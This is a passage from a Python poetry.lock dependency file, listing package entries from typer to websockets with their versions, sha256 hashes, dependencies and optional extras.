"sentencepiece (>=0.1.91,!=0.1.92)", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timeout-decorator", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "urllib3 (<2.0.0)"] dev-torch = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "accelerate (>=0.20.3)", "beautifulsoup4", "black (>=23.1,<24.0)", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "fugashi (>=1.0)", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "kenlm", "librosa", "nltk", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "ray[tune]", "rhoknp (>=1.1.0,<1.3.1)", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "timeout-decorator", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"] docs = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "codecarbon (==1.2.0)", "decord (==0.6.0)", "flax (>=0.4.1,<=0.7.0)", "hf-doc-builder", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "phonemizer", "protobuf", "pyctcdecode (>=0.4.0)", "ray[tune]", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision"] docs-specific = ["hf-doc-builder"] fairscale = ["fairscale (>0.3)"] flax = ["flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "optax (>=0.0.8,<=0.1.4)"] flax-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"] ftfy = ["ftfy"] integrations = ["optuna", "ray[tune]", "sigopt"] ja = ["fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "rhoknp (>=1.1.0,<1.3.1)", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)"] modelcreation = ["cookiecutter (==1.7.3)"] natten = ["natten (>=0.14.6)"] onnx = ["onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "tf2onnx"] onnxruntime = ["onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)"] optuna = ["optuna"] quality = ["GitPython (<3.1.19)", "black (>=23.1,<24.0)", "datasets (!=2.5.0)", "hf-doc-builder (>=0.3.0)", "isort (>=5.5.4)", "ruff (>=0.0.241,<=0.0.259)", "urllib3 (<2.0.0)"] ray = ["ray[tune]"] retrieval = ["datasets (!=2.5.0)", "faiss-cpu"] sagemaker = ["sagemaker (>=2.31.0)"] sentencepiece = ["protobuf", "sentencepiece (>=0.1.91,!=0.1.92)"] serving = ["fastapi", "pydantic (<2)", "starlette", "uvicorn"] sigopt = ["sigopt"] sklearn = ["scikit-learn"] speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"] testing = ["GitPython (<3.1.19)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder (>=0.3.0)", "nltk", "parameterized", "protobuf", "psutil", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "sacrebleu (>=1.4.12,<2.0.0)", 
"sacremoses", "timeout-decorator"] tf = ["keras-nlp (>=0.3.1)", "onnxconverter-common", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx"] tf-cpu = ["keras-nlp (>=0.3.1)", "onnxconverter-common", "tensorflow-cpu (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx"] tf-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"] timm = ["timm"] tokenizers = ["tokenizers (>=0.11.1,!=0.11.3,<0.14)"] torch = ["accelerate (>=0.20.3)", "torch (>=1.10,!=1.12.0)"] torch-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"] torch-vision = ["Pillow (<10.0.0)", "torchvision"] torchhub = ["filelock", "huggingface-hub (>=0.15.1,<1.0)", "importlib-metadata", "numpy (>=1.17)", "packaging (>=20.0)", "protobuf", "regex (!=2019.12.17)", "requests", "sentencepiece (>=0.1.91,!=0.1.92)", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "tqdm (>=4.27)"] video = ["av (==9.2.0)", "decord (==0.6.0)"] vision = ["Pillow (<10.0.0)"] [[package]] name = "typer" version = "0.9.0" description = "Typer, build great CLIs. Easy to code. Based on Python type hints." optional = true python-versions = ">=3.6" files = [ {file = "typer-0.9.0-py3-none-any.whl", hash = "sha256:5d96d986a21493606a358cae4461bd8cdf83cbf33a5aa950ae629ca3b51467ee"}, {file = "typer-0.9.0.tar.gz", hash = "sha256:50922fd79aea2f4751a8e0408ff10d2662bd0c8bbfa84755a699f3bada2978b2"}, ] [package.dependencies] click = ">=7.1.1,<9.0.0" typing-extensions = ">=3.7.4.3" [package.extras] all = ["colorama (>=0.4.3,<0.5.0)", "rich (>=10.11.0,<14.0.0)", "shellingham (>=1.3.0,<2.0.0)"] dev = ["autoflake (>=1.3.1,<2.0.0)", "flake8 (>=3.8.3,<4.0.0)", "pre-commit (>=2.17.0,<3.0.0)"] doc = ["cairosvg (>=2.5.2,<3.0.0)", "mdx-include (>=1.4.1,<2.0.0)", "mkdocs (>=1.1.2,<2.0.0)", "mkdocs-material (>=8.1.4,<9.0.0)", "pillow (>=9.3.0,<10.0.0)"] test = ["black (>=22.3.0,<23.0.0)", "coverage (>=6.2,<7.0)", "isort (>=5.0.6,<6.0.0)", "mypy (==0.910)", "pytest (>=4.4.0,<8.0.0)", "pytest-cov (>=2.10.0,<5.0.0)", "pytest-sugar (>=0.9.4,<0.10.0)", "pytest-xdist (>=1.32.0,<4.0.0)", "rich (>=10.11.0,<14.0.0)", "shellingham (>=1.3.0,<2.0.0)"] [[package]] name = "types-chardet" version = "5.0.4.6" description = "Typing stubs for chardet" optional = false python-versions = "*" files = [ {file = "types-chardet-5.0.4.6.tar.gz", hash = "sha256:caf4c74cd13ccfd8b3313c314aba943b159de562a2573ed03137402b2bb37818"}, {file = "types_chardet-5.0.4.6-py3-none-any.whl", hash = "sha256:ea832d87e798abf1e4dfc73767807c2b7fee35d0003ae90348aea4ae00fb004d"}, ] [[package]] name = "types-protobuf" version = "4.24.0.3" description = "Typing stubs for protobuf" optional = false python-versions = ">=3.7" files = [ {file = "types-protobuf-4.24.0.3.tar.gz", hash = "sha256:048ca006a08ac0563ff04a86ddcdda6f8877b024f5ff89ed6180510b017c3a91"}, {file = "types_protobuf-4.24.0.3-py3-none-any.whl", hash = "sha256:6652be32c647a855cd9c01e6c556ecdc94988188c4de89942ad13e906537aaee"}, ] [[package]] name = "types-pyopenssl" version = "23.2.0.2" description = "Typing stubs for pyOpenSSL" optional = false python-versions = "*" files = [ {file = "types-pyOpenSSL-23.2.0.2.tar.gz", hash = "sha256:6a010dac9ecd42b582d7dd2cc3e9e40486b79b3b64bb2fffba1474ff96af906d"}, {file = "types_pyOpenSSL-23.2.0.2-py3-none-any.whl", hash = "sha256:19536aa3debfbe25a918cf0d898e9f5fbbe6f3594a429da7914bf331deb1b342"}, ] [package.dependencies] cryptography = ">=35.0.0" [[package]] name = "types-python-dateutil" version = "2.8.19.14" description = "Typing stubs for python-dateutil" optional = 
false python-versions = "*" files = [ {file = "types-python-dateutil-2.8.19.14.tar.gz", hash = "sha256:1f4f10ac98bb8b16ade9dbee3518d9ace017821d94b057a425b069f834737f4b"}, {file = "types_python_dateutil-2.8.19.14-py3-none-any.whl", hash = "sha256:f977b8de27787639986b4e28963263fd0e5158942b3ecef91b9335c130cb1ce9"}, ] [[package]] name = "types-pytz" version = "2023.3.1.1" description = "Typing stubs for pytz" optional = false python-versions = "*" files = [ {file = "types-pytz-2023.3.1.1.tar.gz", hash = "sha256:cc23d0192cd49c8f6bba44ee0c81e4586a8f30204970fc0894d209a6b08dab9a"}, {file = "types_pytz-2023.3.1.1-py3-none-any.whl", hash = "sha256:1999a123a3dc0e39a2ef6d19f3f8584211de9e6a77fe7a0259f04a524e90a5cf"}, ] [[package]] name = "types-pyyaml" version = "6.0.12.12" description = "Typing stubs for PyYAML" optional = false python-versions = "*" files = [ {file = "types-PyYAML-6.0.12.12.tar.gz", hash = "sha256:334373d392fde0fdf95af5c3f1661885fa10c52167b14593eb856289e1855062"}, {file = "types_PyYAML-6.0.12.12-py3-none-any.whl", hash = "sha256:c05bc6c158facb0676674b7f11fe3960db4f389718e19e62bd2b84d6205cfd24"}, ] [[package]] name = "types-redis" version = "4.6.0.8" description = "Typing stubs for redis" optional = false python-versions = ">=3.7" files = [ {file = "types-redis-4.6.0.8.tar.gz", hash = "sha256:1abb2859bbf9b171a22ef69d1ece0e35ef93e642fba97538497add884ad75b5e"}, {file = "types_redis-4.6.0.8-py3-none-any.whl", hash = "sha256:4839923b4cce77bbf987290ca83710f8218529eebe1d2c3a0f067416c86847f5"}, ] [package.dependencies] cryptography = ">=35.0.0" types-pyOpenSSL = "*" [[package]] name = "types-requests" version = "2.31.0.6" description = "Typing stubs for requests" optional = false python-versions = ">=3.7" files = [ {file = "types-requests-2.31.0.6.tar.gz", hash = "sha256:cd74ce3b53c461f1228a9b783929ac73a666658f223e28ed29753771477b3bd0"}, {file = "types_requests-2.31.0.6-py3-none-any.whl", hash = "sha256:a2db9cb228a81da8348b49ad6db3f5519452dd20a9c1e1a868c83c5fe88fd1a9"}, ] [package.dependencies] types-urllib3 = "*" [[package]] name = "types-toml" version = "0.10.8.7" description = "Typing stubs for toml" optional = false python-versions = "*" files = [ {file = "types-toml-0.10.8.7.tar.gz", hash = "sha256:58b0781c681e671ff0b5c0319309910689f4ab40e8a2431e205d70c94bb6efb1"}, {file = "types_toml-0.10.8.7-py3-none-any.whl", hash = "sha256:61951da6ad410794c97bec035d59376ce1cbf4453dc9b6f90477e81e4442d631"}, ] [[package]] name = "types-urllib3" version = "1.26.25.14" description = "Typing stubs for urllib3" optional = false python-versions = "*" files = [ {file = "types-urllib3-1.26.25.14.tar.gz", hash = "sha256:229b7f577c951b8c1b92c1bc2b2fdb0b49847bd2af6d1cc2a2e3dd340f3bda8f"}, {file = "types_urllib3-1.26.25.14-py3-none-any.whl", hash = "sha256:9683bbb7fb72e32bfe9d2be6e04875fbe1b3eeec3cbb4ea231435aa7fd6b4f0e"}, ] [[package]] name = "typing-extensions" version = "4.8.0" description = "Backported and Experimental Type Hints for Python 3.8+" optional = false python-versions = ">=3.8" files = [ {file = "typing_extensions-4.8.0-py3-none-any.whl", hash = "sha256:8f92fc8806f9a6b641eaa5318da32b44d401efaac0f6678c9bc448ba3605faa0"}, {file = "typing_extensions-4.8.0.tar.gz", hash = "sha256:df8e4339e9cb77357558cbdbceca33c303714cf861d1eef15e1070055ae8b7ef"}, ] [[package]] name = "typing-inspect" version = "0.9.0" description = "Runtime inspection utilities for typing module." 
optional = false python-versions = "*" files = [ {file = "typing_inspect-0.9.0-py3-none-any.whl", hash = "sha256:9ee6fc59062311ef8547596ab6b955e1b8aa46242d854bfc78f4f6b0eff35f9f"}, {file = "typing_inspect-0.9.0.tar.gz", hash = "sha256:b23fc42ff6f6ef6954e4852c1fb512cdd18dbea03134f91f856a95ccc9461f78"}, ] [package.dependencies] mypy-extensions = ">=0.3.0" typing-extensions = ">=3.7.4" [[package]] name = "tzdata" version = "2023.3" description = "Provider of IANA time zone data" optional = false python-versions = ">=2" files = [ {file = "tzdata-2023.3-py2.py3-none-any.whl", hash = "sha256:7e65763eef3120314099b6939b5546db7adce1e7d6f2e179e3df563c70511eda"}, {file = "tzdata-2023.3.tar.gz", hash = "sha256:11ef1e08e54acb0d4f95bdb1be05da659673de4acbd21bf9c69e94cc5e907a3a"}, ] [[package]] name = "tzlocal" version = "4.3.1" description = "tzinfo object for the local timezone" optional = true python-versions = ">=3.7" files = [ {file = "tzlocal-4.3.1-py3-none-any.whl", hash = "sha256:67d7e7f4ce0a98e9dfde2e02474c60fe846ed032d78b555c554c2e9cba472d84"}, {file = "tzlocal-4.3.1.tar.gz", hash = "sha256:ee32ef8c20803c19a96ed366addd3d4a729ef6309cb5c7359a0cc2eeeb7fa46a"}, ] [package.dependencies] "backports.zoneinfo" = {version = "*", markers = "python_version < \"3.9\""} pytz-deprecation-shim = "*" tzdata = {version = "*", markers = "platform_system == \"Windows\""} [package.extras] devenv = ["black", "check-manifest", "flake8", "pyroma", "pytest (>=4.3)", "pytest-cov", "pytest-mock (>=3.3)", "zest.releaser"] [[package]] name = "upstash-redis" version = "0.15.0" description = "Serverless Redis SDK from Upstash" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "upstash_redis-0.15.0-py3-none-any.whl", hash = "sha256:4a89913cb2bb2422610bc2a9c8d6b9a9d75d0674c22c5ea8037d35d343ee5846"}, {file = "upstash_redis-0.15.0.tar.gz", hash = "sha256:910f6a567142167b742c38efecfabf23f47e24fcbddb00a6b5845cb11064c3af"}, ] [package.dependencies] aiohttp = ">=3.8.4,<4.0.0" requests = ">=2.31.0,<3.0.0" [[package]] name = "uri-template" version = "1.3.0" description = "RFC 6570 URI Template Processor" optional = false python-versions = ">=3.7" files = [ {file = "uri-template-1.3.0.tar.gz", hash = "sha256:0e00f8eb65e18c7de20d595a14336e9f337ead580c70934141624b6d1ffdacc7"}, {file = "uri_template-1.3.0-py3-none-any.whl", hash = "sha256:a44a133ea12d44a0c0f06d7d42a52d71282e77e2f937d8abd5655b8d56fc1363"}, ] [package.extras] dev = ["flake8", "flake8-annotations", "flake8-bandit", "flake8-bugbear", "flake8-commas", "flake8-comprehensions", "flake8-continuation", "flake8-datetimez", "flake8-docstrings", "flake8-import-order", "flake8-literal", "flake8-modern-annotations", "flake8-noqa", "flake8-pyproject", "flake8-requirements", "flake8-typechecking-import", "flake8-use-fstring", "mypy", "pep8-naming", "types-PyYAML"] [[package]] name = "uritemplate" version = "4.1.1" description = "Implementation of RFC 6570 URI Templates" optional = true python-versions = ">=3.6" files = [ {file = "uritemplate-4.1.1-py2.py3-none-any.whl", hash = "sha256:830c08b8d99bdd312ea4ead05994a38e8936266f84b9a7878232db50b044e02e"}, {file = "uritemplate-4.1.1.tar.gz", hash = "sha256:4346edfc5c3b79f694bccd6d6099a322bbeb628dbf2cd86eea55a456ce5124f0"}, ] [[package]] name = "urllib3" version = "1.26.18" description = "HTTP library with thread-safe connection pooling, file post, and more." 
optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*" files = [ {file = "urllib3-1.26.18-py2.py3-none-any.whl", hash = "sha256:34b97092d7e0a3a8cf7cd10e386f401b3737364026c45e622aa02903dffe0f07"}, {file = "urllib3-1.26.18.tar.gz", hash = "sha256:f8ecc1bba5667413457c529ab955bf8c67b45db799d159066261719e328580a0"}, ] [package.extras] brotli = ["brotli (==1.0.9)", "brotli (>=1.0.9)", "brotlicffi (>=0.8.0)", "brotlipy (>=0.6.0)"] secure = ["certifi", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "ipaddress", "pyOpenSSL (>=0.14)", "urllib3-secure-extra"] socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"] [[package]] name = "validators" version = "0.22.0" description = "Python Data Validation for Humans™" optional = true python-versions = ">=3.8" files = [ {file = "validators-0.22.0-py3-none-any.whl", hash = "sha256:61cf7d4a62bbae559f2e54aed3b000cea9ff3e2fdbe463f51179b92c58c9585a"}, {file = "validators-0.22.0.tar.gz", hash = "sha256:77b2689b172eeeb600d9605ab86194641670cdb73b60afd577142a9397873370"}, ] [package.extras] docs-offline = ["myst-parser (>=2.0.0)", "pypandoc-binary (>=1.11)", "sphinx (>=7.1.1)"] docs-online = ["mkdocs (>=1.5.2)", "mkdocs-git-revision-date-localized-plugin (>=1.2.0)", "mkdocs-material (>=9.2.6)", "mkdocstrings[python] (>=0.22.0)", "pyaml (>=23.7.0)"] hooks = ["pre-commit (>=3.3.3)"] package = ["build (>=1.0.0)", "twine (>=4.0.2)"] runner = ["tox (>=4.11.1)"] sast = ["bandit[toml] (>=1.7.5)"] testing = ["pytest (>=7.4.0)"] tooling = ["black (>=23.7.0)", "pyright (>=1.1.325)", "ruff (>=0.0.287)"] tooling-extras = ["pyaml (>=23.7.0)", "pypandoc-binary (>=1.11)", "pytest (>=7.4.0)"] [[package]] name = "vcrpy" version = "5.1.0" description = "Automatically mock your HTTP interactions to simplify and speed up testing" optional = false python-versions = ">=3.8" files = [ {file = "vcrpy-5.1.0-py2.py3-none-any.whl", hash = "sha256:605e7b7a63dcd940db1df3ab2697ca7faf0e835c0852882142bafb19649d599e"}, {file = "vcrpy-5.1.0.tar.gz", hash = "sha256:bbf1532f2618a04f11bce2a99af3a9647a32c880957293ff91e0a5f187b6b3d2"}, ] [package.dependencies] PyYAML = "*" urllib3 = {version = "<2", markers = "python_version < \"3.10\""} wrapt = "*" yarl = "*" [[package]] name = "watchdog" version = "3.0.0" description = "Filesystem events monitoring" optional = false python-versions = ">=3.7" files = [ {file = "watchdog-3.0.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:336adfc6f5cc4e037d52db31194f7581ff744b67382eb6021c868322e32eef41"}, {file = "watchdog-3.0.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:a70a8dcde91be523c35b2bf96196edc5730edb347e374c7de7cd20c43ed95397"}, {file = "watchdog-3.0.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:adfdeab2da79ea2f76f87eb42a3ab1966a5313e5a69a0213a3cc06ef692b0e96"}, {file = "watchdog-3.0.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:2b57a1e730af3156d13b7fdddfc23dea6487fceca29fc75c5a868beed29177ae"}, {file = "watchdog-3.0.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7ade88d0d778b1b222adebcc0927428f883db07017618a5e684fd03b83342bd9"}, {file = "watchdog-3.0.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:7e447d172af52ad204d19982739aa2346245cc5ba6f579d16dac4bfec226d2e7"}, {file = "watchdog-3.0.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:9fac43a7466eb73e64a9940ac9ed6369baa39b3bf221ae23493a9ec4d0022674"}, {file = "watchdog-3.0.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:8ae9cda41fa114e28faf86cb137d751a17ffd0316d1c34ccf2235e8a84365c7f"}, {file = 
"watchdog-3.0.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:25f70b4aa53bd743729c7475d7ec41093a580528b100e9a8c5b5efe8899592fc"}, {file = "watchdog-3.0.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4f94069eb16657d2c6faada4624c39464f65c05606af50bb7902e036e3219be3"}, {file = "watchdog-3.0.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:7c5f84b5194c24dd573fa6472685b2a27cc5a17fe5f7b6fd40345378ca6812e3"}, {file = "watchdog-3.0.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3aa7f6a12e831ddfe78cdd4f8996af9cf334fd6346531b16cec61c3b3c0d8da0"}, {file = "watchdog-3.0.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:233b5817932685d39a7896b1090353fc8efc1ef99c9c054e46c8002561252fb8"}, {file = "watchdog-3.0.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:13bbbb462ee42ec3c5723e1205be8ced776f05b100e4737518c67c8325cf6100"}, {file = "watchdog-3.0.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:8f3ceecd20d71067c7fd4c9e832d4e22584318983cabc013dbf3f70ea95de346"}, {file = "watchdog-3.0.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c9d8c8ec7efb887333cf71e328e39cffbf771d8f8f95d308ea4125bf5f90ba64"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_aarch64.whl", hash = "sha256:0e06ab8858a76e1219e68c7573dfeba9dd1c0219476c5a44d5333b01d7e1743a"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_armv7l.whl", hash = "sha256:d00e6be486affb5781468457b21a6cbe848c33ef43f9ea4a73b4882e5f188a44"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_i686.whl", hash = "sha256:c07253088265c363d1ddf4b3cdb808d59a0468ecd017770ed716991620b8f77a"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_ppc64.whl", hash = "sha256:5113334cf8cf0ac8cd45e1f8309a603291b614191c9add34d33075727a967709"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:51f90f73b4697bac9c9a78394c3acbbd331ccd3655c11be1a15ae6fe289a8c83"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_s390x.whl", hash = "sha256:ba07e92756c97e3aca0912b5cbc4e5ad802f4557212788e72a72a47ff376950d"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_x86_64.whl", hash = "sha256:d429c2430c93b7903914e4db9a966c7f2b068dd2ebdd2fa9b9ce094c7d459f33"}, {file = "watchdog-3.0.0-py3-none-win32.whl", hash = "sha256:3ed7c71a9dccfe838c2f0b6314ed0d9b22e77d268c67e015450a29036a81f60f"}, {file = "watchdog-3.0.0-py3-none-win_amd64.whl", hash = "sha256:4c9956d27be0bb08fc5f30d9d0179a855436e655f046d288e2bcc11adfae893c"}, {file = "watchdog-3.0.0-py3-none-win_ia64.whl", hash = "sha256:5d9f3a10e02d7371cd929b5d8f11e87d4bad890212ed3901f9b4d68767bee759"}, {file = "watchdog-3.0.0.tar.gz", hash = "sha256:4d98a320595da7a7c5a18fc48cb633c2e73cda78f93cac2ef42d42bf609a33f9"}, ] [package.extras] watchmedo = ["PyYAML (>=3.10)"] [[package]] name = "wcwidth" version = "0.2.8" description = "Measures the displayed width of unicode strings in a terminal" optional = false python-versions = "*" files = [ {file = "wcwidth-0.2.8-py2.py3-none-any.whl", hash = "sha256:77f719e01648ed600dfa5402c347481c0992263b81a027344f3e1ba25493a704"}, {file = "wcwidth-0.2.8.tar.gz", hash = "sha256:8705c569999ffbb4f6a87c6d1b80f324bd6db952f5eb0b95bc07517f4c1813d4"}, ] [[package]] name = "weaviate-client" version = "3.25.1" description = "A python native Weaviate client" optional = true python-versions = ">=3.8" files = [ {file = "weaviate-client-3.25.1.tar.gz", hash = "sha256:cfa6435e365bae734d875013124baa14cada7e36af4f2d82def5a15b44374978"}, {file = "weaviate_client-3.25.1-py3-none-any.whl", hash = "sha256:94680aff46c3ad2748a7c6530c6466c6aee6d03b5b69c0c814f987f2fdefae36"}, ] 
[package.dependencies] authlib = ">=1.2.1,<2.0.0" requests = ">=2.30.0,<3.0.0" validators = ">=0.21.2,<1.0.0" [package.extras] grpc = ["grpcio (>=1.57.0,<2.0.0)", "grpcio-tools (>=1.57.0,<2.0.0)"] [[package]] name = "webcolors" version = "1.13" description = "A library for working with the color formats defined by HTML and CSS." optional = false python-versions = ">=3.7" files = [ {file = "webcolors-1.13-py3-none-any.whl", hash = "sha256:29bc7e8752c0a1bd4a1f03c14d6e6a72e93d82193738fa860cbff59d0fcc11bf"}, {file = "webcolors-1.13.tar.gz", hash = "sha256:c225b674c83fa923be93d235330ce0300373d02885cef23238813b0d5668304a"}, ] [package.extras] docs = ["furo", "sphinx", "sphinx-copybutton", "sphinx-inline-tabs", "sphinx-notfound-page", "sphinxext-opengraph"] tests = ["pytest", "pytest-cov"] [[package]] name = "webencodings" version = "0.5.1" description = "Character encoding aliases for legacy web content" optional = false python-versions = "*" files = [ {file = "webencodings-0.5.1-py2.py3-none-any.whl", hash = "sha256:a0af1213f3c2226497a97e2b3aa01a7e4bee4f403f95be16fc9acd2947514a78"}, {file = "webencodings-0.5.1.tar.gz", hash = "sha256:b36a1c245f2d304965eb4e0a82848379241dc04b865afcc4aab16748587e1923"}, ] [[package]] name = "websocket-client" version = "1.6.4" description = "WebSocket client for Python with low level API options" optional = false python-versions = ">=3.8" files = [ {file = "websocket-client-1.6.4.tar.gz", hash = "sha256:b3324019b3c28572086c4a319f91d1dcd44e6e11cd340232978c684a7650d0df"}, {file = "websocket_client-1.6.4-py3-none-any.whl", hash = "sha256:084072e0a7f5f347ef2ac3d8698a5e0b4ffbfcab607628cadabc650fc9a83a24"}, ] [package.extras] docs = ["Sphinx (>=6.0)", "sphinx-rtd-theme (>=1.1.0)"] optional = ["python-socks", "wsaccel"] test = ["websockets"] [[package]] name = "websockets" version = "12.0" description = "An implementation of the WebSocket Protocol (RFC 6455 & 7692)" optional = true python-versions = ">=3.8" files = [ {file = "websockets-12.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:d554236b2a2006e0ce16315c16eaa0d628dab009c33b63ea03f41c6107958374"}, {file = "websockets-12.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:2d225bb6886591b1746b17c0573e29804619c8f755b5598d875bb4235ea639be"}, {file = "websockets-12.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:eb809e816916a3b210bed3c82fb88eaf16e8afcf9c115ebb2bacede1797d2547"}, {file = "websockets-12.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c588f6abc13f78a67044c6b1273a99e1cf31038ad51815b3b016ce699f0d75c2"}, {file = "websockets-12.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5aa9348186d79a5f232115ed3fa9020eab66d6c3437d72f9d2c8ac0c6858c558"}, {file = "websockets-12.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6350b14a40c95ddd53e775dbdbbbc59b124a5c8ecd6fbb09c2e52029f7a9f480"}, {file = "websockets-12.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:70ec754cc2a769bcd218ed8d7209055667b30860ffecb8633a834dde27d6307c"}, {file = "websockets-12.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:6e96f5ed1b83a8ddb07909b45bd94833b0710f738115751cdaa9da1fb0cb66e8"}, {file = "websockets-12.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4d87be612cbef86f994178d5186add3d94e9f31cc3cb499a0482b866ec477603"}, {file = "websockets-12.0-cp310-cp310-win32.whl", hash = 
"sha256:befe90632d66caaf72e8b2ed4d7f02b348913813c8b0a32fae1cc5fe3730902f"}, {file = "websockets-12.0-cp310-cp310-win_amd64.whl", hash = "sha256:363f57ca8bc8576195d0540c648aa58ac18cf85b76ad5202b9f976918f4219cf"}, {file = "websockets-12.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5d873c7de42dea355d73f170be0f23788cf3fa9f7bed718fd2830eefedce01b4"}, {file = "websockets-12.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:3f61726cae9f65b872502ff3c1496abc93ffbe31b278455c418492016e2afc8f"}, {file = "websockets-12.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ed2fcf7a07334c77fc8a230755c2209223a7cc44fc27597729b8ef5425aa61a3"}, {file = "websockets-12.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8e332c210b14b57904869ca9f9bf4ca32f5427a03eeb625da9b616c85a3a506c"}, {file = "websockets-12.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5693ef74233122f8ebab026817b1b37fe25c411ecfca084b29bc7d6efc548f45"}, {file = "websockets-12.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e9e7db18b4539a29cc5ad8c8b252738a30e2b13f033c2d6e9d0549b45841c04"}, {file = "websockets-12.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:6e2df67b8014767d0f785baa98393725739287684b9f8d8a1001eb2839031447"}, {file = "websockets-12.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:bea88d71630c5900690fcb03161ab18f8f244805c59e2e0dc4ffadae0a7ee0ca"}, {file = "websockets-12.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = 